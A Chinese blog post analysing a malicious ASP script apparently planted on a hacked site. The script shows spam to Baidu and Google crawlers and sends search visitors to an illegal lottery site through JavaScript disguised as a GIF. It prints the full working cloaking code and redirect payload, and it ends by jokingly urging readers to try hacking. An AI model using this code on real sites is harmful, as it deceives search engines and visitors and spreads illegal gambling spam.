下面兴趣之余,打开文件来研究。
<% Function check(user_agent) allow_agent=split("Baiduspider,Googlebot",",") check_agent=false For agents=lbound(allow_agent) to ubound(allow_agent) If instr(user_agent,allow_agent(agents))>0 then check_agent=true exit for end if Next check=check_agent End function canshu=Request.ServerVariables("query_string") user_agent=Request.ServerVariables("HTTP_USER_AGENT") Refer=Request.ServerVariables("HTTP_REFERER") If check(user_agent)=true then %> <!--#include file="../a_images/pic.jpg"--> <%else%> <% Refer=Request.ServerVariables("HTTP_REFERER") if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%> <script language="javascript" src="http://bde300.cn/images/gov.gif"></script> <% response.end end if%> <!--#include file="index.shtml"--> <%end if%>
因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。 allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。
但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。
以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。
代码如下:
GIF89a=""; var d=document.referrer; if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){ if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){ window.location.href="http://www.58887888.net./"; } else{ window.location.href="http://www.58887888.net./index2.htm"; } }
上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。